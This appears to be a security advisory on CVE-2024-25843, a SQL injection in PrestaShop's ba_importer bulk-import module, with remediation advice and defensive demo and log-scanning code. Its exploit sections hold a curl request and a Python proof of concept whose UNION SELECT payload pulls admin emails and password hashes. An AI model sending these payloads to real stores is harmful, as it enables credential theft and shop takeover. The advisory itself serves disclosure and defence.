PrestaShop is a popular e-commerce platform used worldwide. Add-ons enhance its abilities, but sometimes they also introduce security risks. This is the case for the "Import/Update Bulk Product from any Csv/Excel File Pro" module, also known as ba_importer. Through version 1.1.28, a critical SQL injection vulnerability (CVE-2024-25843) lets *unauthenticated attackers*—even guests—run malicious SQL directly against the store’s database. Let’s explore how this works, what risk it brings, and what you can do about it.
What is CVE-2024-25843?
- Module: Import/Update Bulk Product from any Csv/Excel File Pro (ba_importer)
- Severity: Critical
- Access Required: None (guest/anonymous)
In simple words
If you run this PrestaShop add-on, attackers can send crafted requests and trick your shop into executing their own SQL commands—no login needed! This means they could steal data, delete information, or even create an administrator account and fully take over your shop.
How Does the SQL Injection Happen?
The affected versions did not sanitize or filter user input from requests to a script (usually a PHP endpoint) that processes CSV or Excel file data. Some of the parameters from the file or the request get inserted directly into a SQL query.
Here’s an example of what the vulnerable code might look like (simplified for clarity):
// File: controllers/front/upload.php (example)
$product_id = $_POST['product_id']; // input from unauthenticated user
$sql = "SELECT * FROM ps_product WHERE id_product = $product_id";
$result = Db::getInstance()->executeS($sql);
Problem: If someone sends product_id as 1 OR 1=1, the query becomes:
SELECT * FROM ps_product WHERE id_product = 1 OR 1=1
This means all products are selected—clearly not intended! It gets even worse if someone sends malicious payloads.
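To make the difference concrete, here is an added example (not the module's code and not the PrestaShop Db class) that reproduces the tautology above against an in-memory SQLite stand-in for ps_product, then shows the hardened form: reject anything that is not a plain integer and bind the value as a query parameter instead of concatenating it. The table layout and rows are constructed for the demo.

```python
import re
import sqlite3

# Constructed stand-in for PrestaShop's ps_product table (not the real schema),
# so the injection can be reproduced offline.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ps_product (id_product INTEGER PRIMARY KEY, reference TEXT)")
    conn.executemany(
        "INSERT INTO ps_product VALUES (?, ?)",
        [(1, "SKU-1"), (2, "SKU-2"), (3, "SKU-3")],
    )
    return conn


def lookup_vulnerable(conn, product_id):
    """Same pattern as the PHP above: untrusted input concatenated into SQL."""
    sql = f"SELECT id_product, reference FROM ps_product WHERE id_product = {product_id}"
    return conn.execute(sql).fetchall()


# Only a run of ASCII digits is an acceptable product id.
_INT_RE = re.compile(r"[0-9]+")


def lookup_safe(conn, product_id):
    """Hardened form: validate the shape, then bind the value as a parameter.

    Either measure alone stops this injection; together they also reject junk
    early instead of running a query that can never match anything.
    """
    if not isinstance(product_id, str) or not _INT_RE.fullmatch(product_id):
        raise ValueError("product_id must be an unsigned integer")
    sql = "SELECT id_product, reference FROM ps_product WHERE id_product = ?"
    return conn.execute(sql, (int(product_id),)).fetchall()


def demo():
    """Return (rows leaked by the vulnerable query, rows from the safe query, payload rejected?)."""
    conn = make_db()
    leaked = lookup_vulnerable(conn, "1 OR 1=1")  # tautology: every row comes back
    normal = lookup_safe(conn, "1")               # exactly one row, as intended
    try:
        lookup_safe(conn, "1 OR 1=1")
        rejected = False
    except ValueError:
        rejected = True
    return leaked, normal, rejected


if __name__ == "__main__":
    leaked, normal, rejected = demo()
    print("vulnerable query returned", len(leaked), "rows for '1 OR 1=1'")
    print("safe query returned", normal, "and rejected the payload:", rejected)
```

The same two controls map directly onto the PHP: cast or validate the request value before it goes near a query, and let the database driver bind it rather than building the string yourself.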
A Simple Exploit
Suppose the vulnerable endpoint is at /modules/ba_importer/upload.php. An attacker could send a POST request like this:
curl -X POST https://yourshop.com/modules/ba_importer/upload.php \
-d 'product_id= UNION SELECT id,email,passwd FROM ps_employee -- '
This could dump your admin emails and password hashes!
The Impact: What Could Attackers Do?
- Steal personal data: Email addresses, orders, employee/admin info
Proof-of-Concept Exploit
Here’s a *basic* Python proof-of-concept using requests. Warning: Only test this on your own systems!
import requests
url = "https://yourshop.com/modules/ba_importer/upload.php"
payload = {
'product_id': ' UNION SELECT id,email,passwd FROM ps_employee -- '
}
r = requests.post(url, data=payload)
print(r.text) # This will print out admin IDs, emails, and password hashes if vulnerable!
Official References
- PrestaShop Addons - Import/Update Bulk Product Module
- NVD - CVE-2024-25843 Detail
- GitHub Issue & Public Advisory (if released)
1. Update Immediately
If you use ba_importer, upgrade to the latest version as soon as a patch is available. Visit the Buy Addons page for updates.
2. Disable the Module
If you can’t update, disable the module by removing it from PrestaShop or deleting its directory:
rm -rf modules/ba_importer
3. Block Unnecessary Endpoints
Use a web application firewall (WAF) to block access to vulnerable PHP files for non-admins.
4. Monitor Your Logs
Check for strange requests to /modules/ba_importer/upload.php or similar endpoints.
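As an added example (not part of the original advisory), the script below scans access-log lines in the common "combined" format and flags requests that touch the ba_importer directory, requests that reach the module through PrestaShop's generic module front-controller route (`index.php?fc=module&module=ba_importer`, assumed here as the routing convention), and query strings carrying SQL keywords. The log lines are constructed for the example; a real access log does not record POST bodies, so a POST to the endpoint is flagged on its path alone and deserves a manual look.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in the "combined" access-log format; the IPs are
# documentation ranges and every request is made up for this example.
SAMPLE_LOG = """\
203.0.113.10 - - [27/Feb/2024:17:20:01 +0000] "POST /modules/ba_importer/upload.php HTTP/1.1" 200 5123 "-" "curl/8.4.0"
198.51.100.7 - - [27/Feb/2024:17:21:44 +0000] "GET /modules/ba_importer/upload.php?product_id=1%20UNION%20SELECT%20id%2Cemail%2Cpasswd%20FROM%20ps_employee--%20 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.5 - - [27/Feb/2024:17:22:10 +0000] "GET /index.php?id_product=12&controller=product HTTP/1.1" 200 8800 "-" "Mozilla/5.0"
198.51.100.9 - - [27/Feb/2024:17:23:02 +0000] "GET /index.php?fc=module&module=ba_importer&controller=upload HTTP/1.1" 200 1200 "-" "python-requests/2.31"
192.0.2.8 - - [27/Feb/2024:17:23:55 +0000] "POST /admin-dev/index.php?controller=AdminProducts HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
MODULE_PATH = "/modules/ba_importer/"
# Assumed routing convention for PrestaShop module front controllers.
MODULE_ROUTE = re.compile(r"(^|&)module=ba_importer(&|$)")
SQL_HINTS = re.compile(
    r"\b(union|select|insert|update|delete|drop)\b|--|/\*|\bor\b\s*\d+\s*=\s*\d+",
    re.IGNORECASE,
)


def classify(line):
    """Return a dict describing why the line is suspicious, or None if it is not."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    decoded = unquote_plus(query)
    reasons = []
    if path.startswith(MODULE_PATH):
        reasons.append("request to ba_importer endpoint")
    if MODULE_ROUTE.search(decoded):
        reasons.append("ba_importer via module route")
    if SQL_HINTS.search(decoded):
        reasons.append("SQL keywords in query string")
    if not reasons:
        return None
    return {
        "ip": m.group("ip"),
        "time": m.group("ts"),
        "method": m.group("method"),
        "path": path,
        "status": m.group("status"),
        "ua": m.group("ua"),
        "reasons": reasons,
    }


def scan(log_text):
    """Run classify() over every line and keep the hits, in log order."""
    return [hit for line in log_text.splitlines() if (hit := classify(line))]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["method"], hit["path"], "->", "; ".join(hit["reasons"]))
```

Run it over a copied access log (`scan(open(path).read())`) and review every hit; a flagged request from an unknown client after the module was installed is the trigger for the database checks the advisory above implies (new employee accounts, changed password hashes).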
Final Thoughts
SQL injection is one of the most dangerous web vulnerabilities. In this case, just having this module enabled puts your whole store at risk. Take this seriously—update or remove ba_importer now!
Timeline
Published on: 02/27/2024 17:15:12 UTC
Last modified on: 08/29/2024 20:36:21 UTC